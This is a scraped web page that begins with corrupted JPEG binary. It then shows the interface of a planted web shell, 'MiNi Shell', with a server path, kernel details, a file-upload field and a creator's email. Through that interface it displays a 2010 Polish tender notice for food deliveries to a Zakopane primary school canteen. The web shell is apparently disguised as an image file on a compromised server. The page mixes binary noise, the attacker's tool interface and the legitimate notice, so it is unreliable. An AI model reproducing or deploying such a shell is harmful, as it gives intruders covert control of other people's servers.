JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101201/391464-N-2010.html

<p class="kh_header"><b>Zakopane: przetarg nieograniczony na zaopatrzenie stołówki szkolnej w artykuły żywnościowe w 2011 r.</b><br>
<b>Numer ogłoszenia: 391464 - 2010; data zamieszczenia: 01.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 5 , ul. Chramcówki 27, 34-500 Zakopane, woj. małopolskie, tel. 018 2068637, faks 018 2068637.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp5zakopane.szkolnastrona.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przetarg nieograniczony na zaopatrzenie stołówki szkolnej w artykuły żywnościowe w 2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych  (zgodnie z opracowanymi załącznikami )do stołówki szkolnej w Szkole Podstawowej nr 5 w Zakopanem w 2011 r.:
PAKIET I -mięso wołowe i wieprzowe.    CPV-15100000-9
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Wołowe pieczeń bez kości	kg	 150  
Schab bez kości	kg	670
Żeberka wieprzowe świeże-paski	kg	160
Karkówka bez kości	kg	280
Mięso mielone cielęco- wieprzowe	kg	340
Łopatka bez kości	kg	340
Rozbratel wołowy	kg	30

PAKIET II - mięso drobiowe ,podroby          CPV-15100000-9   
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Filet z kurczaka	kg	250
Udka z kurczaka	kg	800
Filet z indyka	kg	200
Kurczaki	kg	200
Wątróbka z drobiu	kg	80
Porcje rosołowe	kg	550

PAKIET III -wędliny wołowe, wieprzowe, drobiowe      CPV-1510000-9
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Kiełbasa toruńska	kg	260
Boczek wędzony	kg	240
Smalec wieprzowy (kostka)	kg	75
Kaszanka	kg	50

Wykaz zapotrzebowania ilościowego na PAKIET IV - nabiał   -  CPV-15500000-3
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Twaróg półtłusty	kg	80
Masło ( 82% tłuszczu )   - kostka	kg	20
Margaryna mleczna	kg	120
Śmietana  18%         500ml	l	800
Mleko karton 2%	l	350
Jogurt - różne smaki 125 g	szt.	1500
Kefir 2%	l	180

PAKIET V - jarzyny, owoce, przetwory      CPV-15300000-1
ARTYKUŁ	
Jedn. miary
Zużycie roczne
Buraki	kg	600
Cebula	kg	160
Czosnek	kg	5
Cebula prażona	kg	4
Fasola JAŚ	kg	45
Fasolka szparagowa świeża	kg	25
Groch łuszczony	kg	35
Kapusta kiszona (w woreczkach 1 kg)	kg	160
Kapusta kiszona z beczki	kg	360
Kapusta biała	kg	400
Kapusta biała młoda	szt.	50
Kapusta czerwona	kg	300
Kapusta włoska	kg	20
Kapusta pekińska	szt.	300
Koper zielony	pęczek	400
Kalafior świeży	szt.	110
Marchew	kg	900
Ogórki zielone	kg	280
Ogórki kiszone	kg	400
Pietruszka korzeń	kg	200
Pietruszka zielona	pęczek	600
Pory	szt.	30
Papryka czerwona	kg	55
Pieczarki	kg	115
Pomidory	kg	250
Rzodkiewka	pęczek	80
Seler	
kg	
200
Sałata zielona	szt.	150
Szczypiorek	pęczek	120
Ziemniaki młode	kg	110
Ziemniaki	kg	9000
Nektarynki	kg	30
Banany	kg	340
Mandarynki	kg	150
Pomarańcze	kg	170
Truskawki świeże	kg	15
Cytryny	kg	10
Jabłka	kg	250
Groszek konserwowy 400g	szt.	180
Szczaw konserwowy 0,40 l	szt.	100
Kukurydza konserwowa 400g	szt.	160
Ogórki konserwowe 0,9 l	szt.	170
Chrzan tarty    0,40l	szt.	55
Koncentrat pomidorowy   30%   0,80 kg - Złoty Bażant	szt.	70
Syrop malinowy 490ml	szt.	50
Galaretka owocowa różne smaki	szt.	400

Wykaz zapotrzebowania ilościowego na PAKIET VI - pieczywo        CPV-15811000-9
ARTYKUŁY	
Jedn. miary	
Zużycie roczne
Chleb pszenno- żytni    600g	szt.	280
Bułki zwykłe	szt.	230
Bułka tarta w 1kg opakowaniach	kg	250
Drożdżówki z nadzieniem mix smaków	szt.	1100

Wykaz zapotrzebowania ilościowego na PAKIET VII - ryby i konserwy    CPV-152200000-0
ARTYKUŁY	
Jednostka miary	
Zużycie roczne
Filet z mintaja	kg	700

PAKIET VIII - artykuły sypkie i przetwory    CPV-15800000-6     15600000-4
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Cukier w ( opakow. 1kg)	kg	600
Kasza jęczmienna wiejska -gruba (opakow.1 kg)	kg	96
Kasza manna (opakow.1 kg)	kg	36
Mąka pszenna poznańska Typ 500 (opakow.1kg)	kg	600
Makaron łazanki (opakow.1kg)	szt.	180
Makaron świderki lub muszelki ( opakow. 500 g)	szt.	600
Makaron nitki typu Czaniecki( opakow.250g.)	szt.	200
Makaron spaghetti (opakow. 500 g)	szt.	90
Makaron zacierka  (opakow.200 g.)	szt.	260

Ryż biały ( opakow. 1 kg)	kg	250
Sól (opakow. 1kg)	kg	340
Herbata granulowana typu indyjska 80 g	szt.	100
Kwasek cytrynowy 20g	szt.	30
Kminek 20g	szt.	40
Liść laurowy 8g	szt.	45
Cukier waniliowy 32g	szt.	20
Cynamon 20g	szt.	20
Majeranek 10g	szt.	40
Przyprawa w płynie typu Magii -   1 l	szt.	120
Ocet spirytusowy - 0,5 l	szt.	50
Pieprz naturalny mielony 50g	szt.	140
Papryka słodka 20g	szt.	110
Przyprawa grill klasyczny typu  Kamis(opakow.1200g)	szt.	2
Przyprawa do mielonego typu Kamis(opakow.700g)	szt.	2
Przyprawa do kurczaka łagodna typu  Kamis (opakow.1000g)	szt.	5
Przyprawa do gulaszu typu  Kamis(opakow.900g)	szt.	2
Przyprawa do ryb typu  Kamis(opakow.800g)	szt.	2
Przyprawa sypka typu Vegeta, Kucharek(opakow.1kg )	kg	40
Ziele angielskie 15 g	szt.	100
Musztarda     200 g	szt.	30
Bulion z drobiu  60g	szt.	40
Żurek w proszku typu Kamis (opakowania 
900g )	szt.	12
Olej uniwersalny roślinny           5 l	szt.	96
Majonez typu kielecki (opakowania 0,5l)	szt.	110
Wafelki w czekoladzie typu Grześki, Princesa 39 g 	szt.	1500
Wafelki w czekoladzie Prince-Polo 36g	szt.	510
Baton  3-BIT  40g	szt.	400
Batony nadziewane w czekoladzie 41 g	szt.	800

Wykaz zapotrzebowania ilościowego na PAKIET IX-  jaja    CPV-03142500-3
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Jaja  I gat.	szt.	3600

PAKIET X - produkty głęboko mrożone, mrożonki   CPV-15896000-5, 15331170-9
ARTYKUŁ	
Jedn. miary	
Zużycie roczne
Naleśniki z serem    90g	szt.	5000
Krokiety z mięsem    110g	szt.	4500
Pierogi ruskie	kg	100
Fasolka szparagowa - zielona mrożona	kg	90
Fasolka szparagowa- żółta mrożona	kg	90
Kalafior mrożony	kg	60
Mieszanka warzywna mrożona 6- składnikowa	kg	60
Truskawki mrożone	kg	90
Mieszanka kompotowa mrożona 6-składnikowa   (opakow.0,5 kg)	kg	300.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dopuszcza sie możliwość zakupu większej ilości artykułów niż podana w specyfikacji po cenie podanej w ofercie przetargowej w zależności od ilości obiadów</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.30.00.00-1, 15.81.10.00-9, 15.20.00.00-0, 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 03.14.25.00-3, 15.89.66.00-5, 15.33.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nieżąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1) nie są wykluczeni z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 ust. 1 i 2 Prawa zamówień publicznych,
2 spełniają warunki określone w art. 22 ust. 1 pkt 1-3 Prawa zamówień publicznych, tzn.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
Sposób oceny spełniania warunków:
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w pkt. 6 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki. Uzupełnienie wymaganych dokumentów będzie możliwe po upływie terminu składania ofert, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania.
W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu, Zamawiający może wezwać wykonawców w określonym przez siebie terminie do złożenia wyjaśnień.
Zamawiający odrzuca ofertę, która nie spełnia następujących wymogów tj:
a) jest niezgodna z ustawa z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,
b) jej treść nie odpowiada SIWZ,
c) jej złożenie stanowi czyn nieuczciwej konkurencji,
d) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
e) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia ,
f) zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić na podstawie art. 88cytowanej niżej ustawy, 
g) wykonawca w terminie 7 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki rachunkowej w obliczeniu ceny,
h) jest nieważna na podstawie odrębnych przepisów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dokument dopuszczający samochody transportowe Wykonawcy do transportu żywności, wraz ze zgodą na przeprowadzenie kontroli przez  Zamawiającego
wg pkt. 6 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie lub certyfikatu wykonywania wszelkich działań związanych z produkcją i dystrybucja żywnością zgodnie z zasadami GMP/GHP oraz systemem HACCP i bezpieczeństwem żywności
Dostarczany towar musi odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu , posiadać wymagane atesty i certyfikaty zgodności z Polską Normą, prawem żywnościowym oraz z obowiązującymi zasadami GMP/GHP i systemu HACCP

Dokument dopuszczający samochody transportowe Wykonawcy do transportu żywności, wraz ze zgodą na przeprowadzenie kontroli przez  Zamawiającego</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmniejszenia ilości dostarczanych towarów, w każdym asortymencie z prawem do proporcjonalnego zmniejszenia ceny.
Wzrost cen na poszczególne towary może nastąpić jedynie za zgodą Zamawiającego w przypadku:
- wzrostu cen o urzędowo ogłoszony przez GUS współczynnik inflacji,
- konieczności wprowadzenia zmian wynikających z okoliczności, których
nie można było przewidzieć w chwili zawarcia umowy, nie zależnych od dostawcy, po uprzednim, pisemnym powiadomieniu Zamawiającego z 14 dniowym wyprzedzeniem. 
Brak zgody na zmianę ceny towary przez Zamawiającego stanowi podstawę do rozwiązania umowy z 30 dniowym okresem wypowiedzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp5zakopane.szkolnastrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Szkoły Podstawowej nr 5
ul. Chramcówki 27
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2010 godzina 11:00, miejsce: Sekretariat Szkoły Podstawowej nr 5
ul. Chramcówki 27
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com